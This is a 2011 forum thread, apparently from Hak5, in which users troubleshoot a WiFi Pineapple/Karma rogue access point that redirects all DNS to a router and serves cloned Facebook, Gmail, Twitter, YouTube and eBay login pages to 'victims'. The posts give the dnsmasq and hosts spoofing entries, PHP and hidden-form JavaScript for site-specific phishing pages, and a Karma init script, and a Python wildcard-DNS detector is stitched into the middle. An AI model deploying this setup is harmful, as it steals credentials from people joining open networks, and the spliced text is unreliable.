billyblaxsta Posted June 20, 2011

Hello,

I am having the same php problems as a few other forum users so I wanted to provide a detailed analysis of the problem. Hopefully someone more knowledgeable can help.

I installed php using opkg and tested that a php file loads in Firefox which it does. I added *.php:/usr/bin/php to httpd.conf (on the Fon) and added cgi.force_redirect=0 to php.ini (the = sign is not in the instructions at http://hak5.org/hack/pineapple-phishing but is necessary otherwise the browser tries to download the php file rather than executing it). I create dnsmasq.conf and edit it to show /#/192.168.1.1

Here is what should happen:

Client enters any URL ---> dnsmasq forwards them to 192.168.1.1 ---> the index.html file in /www issues a redirection to /www/redirect.php (code below) ---> the template for the specific redirected sites should load.

Redirect.php is:

    <?php
    $ref = $_SERVER['HTTP_HOST'];
    if (strpos($ref, "facebook")) {
        header('Location: facebook.html');
    }
    require('peets.html');
    ?>

AIUI the server URL reference is checked by strpos. If the word "facebook" is in the URL then the user is forwarded to facebook.html; otherwise the user is forwarded to peets.html.

The problem is that all websites forward to peets.html including facebook.com. My edited HTTP headers show:

    http://www.facebook.com/

    GET / HTTP/1.1
    Host: www.facebook.com

    HTTP/1.0 200 OK
    ----------------------------------------------------------
    http://www.facebook.com/redirect.php

    GET /redirect.php HTTP/1.1
    Host: www.facebook.com

    HTTP/1.0 200 OK
    X-Powered-By: PHP/4.4.7
    Content-Type: text/html
    ----------------------------------------------------------
    http://www.facebook.com/peets_files/lhm.css

    GET /peets_files/lhm.css HTTP/1.1
    Host: www.facebook.com
    Referer: http://www.facebook.com/redirect.php

www.facebook.com/redirect.php should redirect to facebook.html but, as we can see, it redirects to peets.html. Why?

Thanks for the help!
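
A client-side check for the dnsmasq catch-all described in the post above (every name answered with one address such as 192.168.1.1), added here as an example and not code from the thread or from any project it mentions. The function names, the probe count and the 0.75 threshold are assumptions made for the illustration.

```python
"""Detect a resolver that answers every name with the same address (added example)."""
import ipaddress
import secrets
import socket
from collections import Counter

# RFC 1918 ranges; a catch-all answer inside one of these points at a local box.
RFC1918 = [ipaddress.ip_network(n) for n in ("10.0.0.0/8", "172.16.0.0/12", "192.168.0.0/16")]


def system_resolve(name):
    """Resolve with the OS resolver; return sorted IPv4 strings, [] when the name does not exist."""
    try:
        infos = socket.getaddrinfo(name, None, socket.AF_INET, socket.SOCK_STREAM)
    except socket.gaierror:
        return []
    return sorted({info[4][0] for info in infos})


def probe_names(count=4):
    """Names that should never resolve: random 128-bit labels, alternating between
    the reserved .invalid TLD (RFC 6761) and .com."""
    return [
        f"{secrets.token_hex(16)}.{'invalid' if i % 2 == 0 else 'com'}"
        for i in range(count)
    ]


def check_wildcard_dns(resolve=system_resolve, names=None, threshold=0.75):
    """Ask for names that cannot exist and report whether they share one answer.

    resolve   -- callable(name) -> list of IPv4 strings (hypothetical hook, lets the
                 check run against a stub instead of the live resolver)
    threshold -- fraction of probes that must return the same address (assumed value)
    """
    names = list(names) if names is not None else probe_names()
    answers = {name: resolve(name) for name in names}

    # Count in how many probes each address appears.
    hits = Counter(ip for ips in answers.values() for ip in set(ips))
    top_ip, top_count = (hits.most_common(1)[0] if hits else (None, 0))

    wildcard = bool(names) and top_count / len(names) >= threshold
    private = bool(
        wildcard and any(ipaddress.ip_address(top_ip) in net for net in RFC1918)
    )
    return {
        "probes": len(names),
        "resolved": sum(1 for ips in answers.values() if ips),
        "wildcard": wildcard,
        "common_address": top_ip if wildcard else None,
        "common_is_private": private,
    }


if __name__ == "__main__":
    # Runs against the resolver of the network the machine is currently on.
    result = check_wildcard_dns()
    print(result)
    if result["common_is_private"]:
        print("Every probe resolved to a private address: DNS on this network is a catch-all.")
```

A catch-all that returns a public address is more likely a captive portal or an ISP's NXDOMAIN redirection; a private address, as in the post, means the answers come from a device on the local network.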

digininja Posted June 21, 2011

You need an exit after the header line, otherwise the php script keeps running and outputs all the rest of its contents.

UnDeFiNeD Posted June 21, 2011

> You need an exit after the header line, otherwise the php script keeps running and outputs all the rest of its contents.

Or simply put else require('peets.html'); so it is part of the conditional :)

    <?php
    $ref = $_SERVER['HTTP_HOST'];
    if (strpos($ref, "facebook")) {
        header('Location: facebook.html');
    } else {
        require('peets.html');
    }
    ?>

digininja Posted June 21, 2011

I'd still add an exit after the header just for completeness.

billyblaxsta Posted June 22, 2011

> I'd still add an exit after the header just for completeness.

I have tried various versions but everything (including facebook.com) redirects to peets.html whereas anything with 'facebook' in the URL should redirect to facebook.html

First I tried Darren's version:

    <?php
    $ref = $_SERVER['HTTP_REFERER'];
    if (strpos($ref, "facebook")) {
        header('Location: facebook.html');
        exit;
    }
    require('peets.html');
    ?>

Then I tried the same version but with HTTP_HOST rather than HTTP_REFERER.

Then I tried using 'exit' as follows for both HTTP_HOST AND HTTP_REFERER.

    <?php
    $ref = $_SERVER['HTTP_REFERER'];
    if (strpos($ref, "facebook")) {
        header('Location: facebook.html');
        exit;
    }
    require('peets.html');
    ?>

Any more suggestions? Thanks!

Binaries Posted June 22, 2011

There's the off chance you might have a "Boolean FALSE" being returned. There are a few ways to counter this but I recommend using preg_match instead. Try this:

    <?php
    $ref = $_SERVER['HTTP_HOST'];
    if (preg_match('/facebook/', $ref)) {
        header('Location: facebook.html');
        exit;
    }
    require('peets.html');
    ?>

http://php.net/manual/en/function.strpos.php

Check out the return value on strpos. This happens because it finds the value 'facebook' within the first position (0). A good way to counter it would have been doing something like this:

    <?php
    $ref = $_SERVER['HTTP_HOST'];
    if (strpos($ref, 'facebook') !== FALSE) {
        header('Location: facebook.html');
        exit;
    }
    require('peets.html');
    ?>

digininja Posted June 22, 2011

I did think of that when I wrote the example but managed to forget it before hitting post.

billyblaxsta Posted June 22, 2011

> There's the off chance you might have a "Boolean FALSE" being returned. There are a few ways to counter this but I recommend using preg_match instead. Try this:
>
>     <?php
>     $ref = $_SERVER['HTTP_HOST'];
>     if (preg_match('/facebook/', $ref)) {
>         header('Location: facebook.html');
>         exit;
>     }
>     require('peets.html');
>     ?>
>
> http://php.net/manual/en/function.strpos.php
>
> Check out the return value on strpos. This happens because it finds the value 'facebook' within the first position (0). A good way to counter it would have been doing something like this:
>
>     <?php
>     $ref = $_SERVER['HTTP_HOST'];
>     if (strpos($ref, 'facebook') !== FALSE) {
>         header('Location: facebook.html');
>         exit;
>     }
>     require('peets.html');
>     ?>

I'm afraid the preg_match idea provides:

    Fatal error: Call to undefined function: preg_match() in /www/redirect.php on line 5

And the second code with !== FALSE redirects all traffic to peets.html as before.

I am wondering whether the problem is that because index.html sends all traffic to redirect.php that when facebook.com is entered, the redirect.php script "sees" the index.html rather than the facebook.com and so quite correctly forwards the user to peets.html.

Also: are we sure that HTTP_POST always forwards the referrer for all browsers (I am using Firefox 3.6).

Any other php ideas? Thanks as always!

digininja Posted June 22, 2011

HTTP_HOST is nothing to do with the referrer, it is the domain name from the URL.

Try this:

    <pre>
    <?php
    $ref = $_SERVER['HTTP_HOST'];
    var_dump ($ref);
    ?>

and tell us what is displayed.

billyblaxsta Posted June 22, 2011

> HTTP_HOST is nothing to do with the referrer, it is the domain name from the URL.
>
> Try this:
>
>     <pre>
>     <?php
>     $ref = $_SERVER['HTTP_HOST'];
>     var_dump ($ref);
>     ?>
>
> and tell us what is displayed.

I connected to the Fon and typed www.randomsite.com/code.php

As you may have assumed it provided a "NULL" output.

digininja Posted June 22, 2011

That's wrong, that value should be populated. Are you definitely using $_SERVER and not $SERVER or something like that?

Only other thing to try is:

    <? phpinfo(); ?>

and post the output from that.

billyblaxsta Posted June 22, 2011

> That's wrong, that value should be populated. Are you definitely using $_SERVER and not $SERVER or something like that?
>
> Only other thing to try is:
>
>     <? phpinfo(); ?>
>
> and post the output from that.

I am using $_SERVER - I copied and pasted your code.

The new code above just loaded a blank page but

    <?php phpinfo(); ?>

loads the page for php 4.4.7.

UnDeFiNeD Posted June 22, 2011

I think he meant for you to post the output of that script.

Also, I'm not a php expert, but maybe try:

    <?php
    $ref = $_SERVER['HTTP_HOST'];
    $ref2 = getenv('HTTP_HOST');
    var_dump ($ref);
    var_dump ($ref2);
    ?>

Edited June 22, 2011 by UnDeFiNeD

billyblaxsta Posted June 22, 2011

> That's wrong, that value should be populated. Are you definitely using $_SERVER and not $SERVER or something like that?
>
> Only other thing to try is:
>
>     <? phpinfo(); ?>
>
> and post the output from that.

I assume you mean the output of php version 4.4.7.

billyblaxsta Posted June 22, 2011

> I think he meant for you to post the output of that script.
>
> Also, I'm not a php expert, but maybe try:
>
>     <?php
>     $ref = $_SERVER['HTTP_HOST'];
>     $ref2 = getenv('HTTP_HOST');
>     var_dump ($ref);
>     var_dump ($ref2);
>     ?>

Output:

    NULL
    bool(false)

digininja Posted June 22, 2011

What URL did you use to get that page?

billyblaxsta Posted June 22, 2011

> What URL did you use to get that page?

I connected the Fon to eth0 then typed www.anysitewhatsoever.com/test.php where test.php runs the code:

    <?php phpinfo(); ?>

test.php is of course in /www.

I can use any site because of the dnsmasq.conf address=/#/192.168.1.1

In http://hak5.org/hack/auto-rickrolling-wifi-pineapple Darren uses

    <?php phpinfo(); ?>

just to check that PHP is installed correctly.

Should I have done something else? Thanks again.

Edited June 22, 2011 by billyblaxsta

digininja Posted June 22, 2011

I don't understand what is going on, the domain name should be passed through to a _SERVER variable but doesn't appear to be.

Anyone else got any idea why this is failing as I'm out of ideas.

UnDeFiNeD Posted June 22, 2011

It looks like the "HTTP_HOST" variable isn't set by either this version of php or by the server (or whatever sets it lol)

I threw together a quick rough fix for you though. I say rough because the victims will need to have javascript enabled...

index.html

    <html>
    <head>
    </head>
    <body>
    <form action="index.php" method="POST" name="theform">
    <input type="text" name="host" value=""/>
    </form>
    <script type="text/javascript">
    document.theform.host.setAttribute("value",window.location);
    document.theform.submit();
    </script>
    </body>
    </html>

index.php (named it index.php because it doesn't redirect, it displays the contents of the phishing pages instead of redirecting to them)

    <?php
    error_reporting(0);
    $ref = $_POST['host'];
    if (strpos($ref, "facebook.com")) {
        include('facebook.html');
    } else if (strpos($ref, "twitter.com")) {
        include('twitter.html');
    } else if (strpos($ref, "gmail.com") || strpos($ref, "mail.google.com")) {
        include('gmail.html');
    } else if (strpos($ref, "yahoo.com")) {
        include('yahoo.html');
    } else if (strpos($ref, "youtube.com")) {
        include('youtube.html');
    } else {
        include('peets.html');
    }
    ?>

Edited June 22, 2011 by UnDeFiNeD

billyblaxsta Posted June 22, 2011

> It looks like the "HTTP_HOST" variable isn't set by either this version of php or by the server (or whatever sets it lol)

I'll look at your code shortly, thanks, but just a thought:

If HTTP_HOST isn't set might not variables like HTTP_X_FORWARDED_FOR, HTTP_X_FORWARDED_HOST, and HTTP_X_FORWARDED_SERVER work instead?

Or, maybe download a PHP version which does use the HTTP_HOST variable?

Binaries Posted June 23, 2011

I've run into the same issue, just looks like the $_SERVER variable doesn't have the item set. Very odd I must say. Looking into it though.

billyblaxsta Posted June 23, 2011

> It looks like the "HTTP_HOST" variable isn't set by either this version of php or by the server (or whatever sets it lol)
>
> I threw together a quick rough fix for you though. I say rough because the victims will need to have javascript enabled...
>
> index.html
>
>     <html>
>     <head>
>     </head>
>     <body>
>     <form action="index.php" method="POST" name="theform">
>     <input type="text" name="host" value=""/>
>     </form>
>     <script type="text/javascript">
>     document.theform.host.setAttribute("value",window.location);
>     document.theform.submit();
>     </script>
>     </body>
>     </html>
>
> index.php (named it index.php because it doesn't redirect, it displays the contents of the phishing pages instead of redirecting to them)
>
>     <?php
>     error_reporting(0);
>     $ref = $_POST['host'];
>     if (strpos($ref, "facebook.com")) {
>         include('facebook.html');
>     } else if (strpos($ref, "twitter.com")) {
>         include('twitter.html');
>     } else if (strpos($ref, "gmail.com") || strpos($ref, "mail.google.com")) {
>         include('gmail.html');
>     } else if (strpos($ref, "yahoo.com")) {
>         include('yahoo.html');
>     } else if (strpos($ref, "youtube.com")) {
>         include('youtube.html');
>     } else {
>         include('peets.html');
>     }
>     ?>

Thanks - that worked a treat. Much appreciated! And thanks also to Robin for all your help.

Binaries Posted June 23, 2011

Seems as though it's based on the browser setting the referrer. If the browser doesn't support it or has referrer settings disabled it's not going to be available, the JS method is a good fallback though.

Thermostaten Posted July 20, 2011

This is how I did it..

    root@router:/# cat /etc/config/httpd
    config 'httpd'
            option 'port' '1338'
            option 'home' '/www'
    config 'httpd'
            option 'port' '80'
            option 'home' '/wwwguest'

    root@router:/# cat /etc/hosts
    #----------------------------------------
    # Local
    #----------------------------------------
    127.0.0.1 localhost.
    10.1.0.2 router jasager
    #----------------------------------------
    # Gateway and services
    #----------------------------------------
    10.1.0.1 gateway
    78.24.191.177 downloads.openwrt.org
    46.4.11.11 downloads.x-wrt.org
    #----------------------------------------
    # Phishing
    #----------------------------------------
    10.1.0.2 www.facebook.com facebook.com
    10.1.0.2 www.facebook.dk facebook.dk
    10.1.0.2 da-dk.facebook.com
    #----------------------------------------
    10.1.0.2 www.twitter.com twitter.com
    10.1.0.2 www.twitter.dk twitter.dk
    #----------------------------------------
    10.1.0.2 www.gmail.dk gmail.dk
    10.1.0.2 www.gmail.com gmail.com
    10.1.0.2 mail.google.com
    10.1.0.2 mail.google.dk
    #----------------------------------------
    #10.1.0.2 plus.google.com plus.google.dk
    #----------------------------------------
    10.1.0.2 www.youtube.com youtube.com
    #----------------------------------------
    10.1.0.2 www.ebay.com ebay.com
    #----------------------------------------
    #10.1.0.2 www.yahoo.com yahoo.com
    #----------------------------------------
    #10.1.0.2 www.linkedin.com linkedin.com
    #----------------------------------------

    root@router:/# cat /etc/php.ini |egrep www|cgi.force_redirect
    doc_root = /wwwguest
    cgi.force_redirect = 0

    root@router:/# cat /wwwguest/index.html
    <html><head></head><body>
    <div id="hideme">
    <form action="index.php" method="POST" name="theform">
    <input type="text" name="host" style="width:0px;" value="" type="hidden"/>
    </form>
    </div>
    <script type="text/javascript">
    document.getElementById('hideme').style.display='none';
    function left(str,n){
      if (n <= 0) return "";
      else if (n > String(str).length) return str;
      else return String(str).substring(0,n);
    }
    function right(str,n){
      if (n <= 0) return "";
      else if (n > String(str).length) return str;
      else {
        var iLen = String(str).length;
        return String(str).substring(iLen,iLen-n);
      }
    }
    var the_url = window.location.href;
    var the_url_len = the_url.length-7;
    the_url = right(the_url,the_url_len)
    var where_is_slash=the_url.indexOf('/');
    the_url = left(the_url,where_is_slash);
    document.theform.host.setAttribute("value","http://"+the_url);
    document.theform.submit();
    </script>
    </body>
    </html>

    root@router:/# cat /wwwguest/index.php
    <?php
    error_reporting(0);
    $ref = strtolower ( $_POST['host'] );
    //$header = str_replace("http://", "https://", $ref);
    //header ("Location: $header/index.php");
    if ("$ref" != "") {
      if (strpos($ref,"facebook.com")||strpos($ref,"www.facebook.com")||strpos($ref,"facebook.dk")||strpos($ref,"www.facebook.com.")){include('facebook.html');}
      else if (strpos($ref,"gmail.com")||strpos($ref,"www.gmail.com")||strpos($ref,"gmail.dk")||strpos($ref,"www.gmail.dk")||strpos($ref,"mail.google")){include('gmail.html');}
      else if (strpos($ref,"twitter.com")||strpos($ref,"www.twitter.com")){include('twitter.html');}
      else if (strpos($ref,"youtube.com")||strpos($ref,"www.youtube.com")){include('youtube.html');}
      else if (strpos($ref,"ebay.com")||strpos($ref,"www.ebay.com")){include('ebay.html');}
      else {include('peets.html');}
    } else {
      echo '<html><head>';
      echo "<meta http-equiv=\"REFRESH\" content=\"0;url=/index.html\">";
      echo '</head><body></body></html>';
    }
    ?>

    root@router:/etc/init.d# cat /etc/init.d/jasager
    #!/bin/sh /etc/rc.common
    # Copyright (C) 2008 dninja@gmail.com
    START=50
    start() {
      include /lib/network
      scan_interfaces
      /karma/bin/create_option_list.rb
      [ -d /karma/www -a -f /karma/etc/httpd.conf ] && httpd -p 1337 -h /karma/www -r karma -c /karma/etc/httpd.conf
      # ORIGINAL iptables -I FORWARD -i ath0 -o br-lan -j ACCEPT
      #-------------------------------------------------------------------------------
      # PREPARE KARMA
      #-------------------------------------------------------------------------------
      iwpriv ath0 maccmd 3; sleep 1 # Clear the MAC ignore list
      iwpriv ath0 maccmd 2; sleep 1 # To make the list a blacklist.
      # iwpriv ath0 maccmd 1; sleep 1 # To make the list a whitelist.
      iwpriv ath0 addmac 00:12:34:13:37:12; sleep 1 # Ignore backtrack wifi interface
      # iwpriv ath0 addkarmassid "Free Internet"; sleep 1 # Ignore my wifi does not work :(
      iwpriv ath0 karma 1; sleep 1 # Start karma
      ifconfig ath0 up; sleep 1 # Activate ath0 interface
      #-------------------------------------------------------------------------------
      # IPTABLES VARIABLES
      #-------------------------------------------------------------------------------
      IPT='/usr/sbin/iptables'
      GATEWAY="10.1.0.1" # To the internet ( my thinkpad )
      JASAGER="10.1.0.2" # To the targets
      #-------------------------------------------------------------------------------
      # REMOVE ALL IPTABLES RULES
      #-------------------------------------------------------------------------------
      # reset the default policies in the filter table.
      $IPT -P INPUT ACCEPT
      $IPT -P FORWARD ACCEPT
      $IPT -P OUTPUT ACCEPT
      # reset the default policies in the nat table.
      $IPT -t nat -P PREROUTING ACCEPT
      $IPT -t nat -P POSTROUTING ACCEPT
      $IPT -t nat -P OUTPUT ACCEPT
      # reset the default policies in the mangle table.
      $IPT -t mangle -P PREROUTING ACCEPT
      $IPT -t mangle -P POSTROUTING ACCEPT
      $IPT -t mangle -P INPUT ACCEPT
      $IPT -t mangle -P OUTPUT ACCEPT
      $IPT -t mangle -P FORWARD ACCEPT
      # flush all the rules in the filter and nat tables.
      $IPT -F
      $IPT -t nat -F
      $IPT -t mangle -F
      # erase all chains that's not default in filter and nat table.
      $IPT -X
      $IPT -t nat -X
      $IPT -t mangle -X
      #-------------------------------------------------------------------------------
      # Allow localhost
      #-------------------------------------------------------------------------------
      $IPT -A INPUT -s 127.0.0.0/8 -i lo -j ACCEPT
      $IPT -A OUTPUT -s 127.0.0.0/8 -o lo -j ACCEPT
      #-------------------------------------------------------------------------------
      # Allow DNS
      #-------------------------------------------------------------------------------
      $IPT -A INPUT -i br-lan -d ${JASAGER} -m udp -p udp --dport 53 -j ACCEPT
      $IPT -A INPUT -i br-lan -d ${JASAGER} -m tcp -p tcp --dport 53 -j ACCEPT
      #-------------------------------------------------------------------------------
      # BLOCK STUFF
      #-------------------------------------------------------------------------------
      $IPT -A INPUT -i eth0 -d ${JASAGER} -p tcp --syn -j DROP # Block SYN
      $IPT -A INPUT -i eth0 -d ${JASAGER} -f -j DROP # Block Fragments
      # Block NMAP Scans:
      $IPT -A INPUT -i eth0 -d ${JASAGER} -p tcp --tcp-flags ALL FIN,URG,PSH -j DROP #
      $IPT -A INPUT -i eth0 -d ${JASAGER} -p tcp --tcp-flags ALL ALL -j DROP #
      $IPT -A INPUT -i eth0 -d ${JASAGER} -p tcp --tcp-flags ALL NONE -j DROP # NULL
      $IPT -A INPUT -i eth0 -d ${JASAGER} -p tcp --tcp-flags SYN,RST SYN,RST -j DROP #
      $IPT -A INPUT -i eth0 -d ${JASAGER} -p tcp --tcp-flags SYN,FIN SYN,FIN -j DROP # XMAS
      $IPT -A INPUT -i eth0 -d ${JASAGER} -p tcp --tcp-flags FIN,ACK FIN -j DROP # FIN
      $IPT -A INPUT -i eth0 -d ${JASAGER} -p tcp --tcp-flags ALL SYN,RST,ACK,FIN,URG -j DROP #
      $IPT -A INPUT -d ${JASAGER} -m state --state NEW -m tcp -p tcp --dport 80 -j ACCEPT # OK for http requests
      #-------------------------------------------------------------------------------
      # iptables -A INPUT -m limit --limit 15/minute -j LOG --log-level 7 --log-prefix "Dropped by firewall:"
      $IPT -A INPUT -s ! ${GATEWAY} -d ${JASAGER} -m state --state NEW -j DROP # NEW only from Gateway
      #-------------------------------------------------------------------------------
      /usr/sbin/iwconfig ath0 txpower 18
      #-------------------------------------------------------------------------------
      logread -f | awk '{if ($0 ~ /(KARMA: |DHCPACK|DHCPDISCOVER|DHCPOFFER|DHCPREQUEST)/) {sub (/ \(.*\).*: /, ": ", $0); print $0 ;}} ' > /tmp/status.log &
      tail -f /tmp/status.log | /karma/bin/logwatch &
    }
    stop() {
      killall httpd
    }

bmccutch Posted August 1, 2011

> It looks like the "HTTP_HOST" variable isn't set by either this version of php or by the server (or whatever sets it lol)
>
> I threw together a quick rough fix for you though. I say rough because the victims will need to have javascript enabled...
>
> index.html
>
>     <html>
>     <head>
>     </head>
>     <body>
>     <form action="index.php" method="POST" name="theform">
>     <input type="text" name="host" value=""/>
>     </form>
>     <script type="text/javascript">
>     document.theform.host.setAttribute("value",window.location);
>     document.theform.submit();
>     </script>
>     </body>
>     </html>
>
> index.php (named it index.php because it doesn't redirect, it displays the contents of the phishing pages instead of redirecting to them)
>
>     <?php
>     error_reporting(0);
>     $ref = $_POST['host'];
>     if (strpos($ref, "facebook.com")) {
>         include('facebook.html');
>     } else if (strpos($ref, "twitter.com")) {
>         include('twitter.html');
>     } else if (strpos($ref, "gmail.com") || strpos($ref, "mail.google.com")) {
>         include('gmail.html');
>     } else if (strpos($ref, "yahoo.com")) {
>         include('yahoo.html');
>     } else if (strpos($ref, "youtube.com")) {
>         include('youtube.html');
>     } else {
>         include('peets.html');
>     }
>     ?>

That worked perfectly, great work. My only change was to avoid the textbox containing the url from being displayed by adding:

    document.theform.host.style.visibility='hidden';

    <html>
    <head>
    </head>
    <body>
    <form action="index.php" method="POST" name="theform">
    <input type="text" name="host" value=""/>
    </form>
    <script type="text/javascript">
    document.theform.host.style.visibility='hidden';
    document.theform.host.setAttribute("value",window.location);
    document.theform.submit();
    </script>
    </body>
    </html>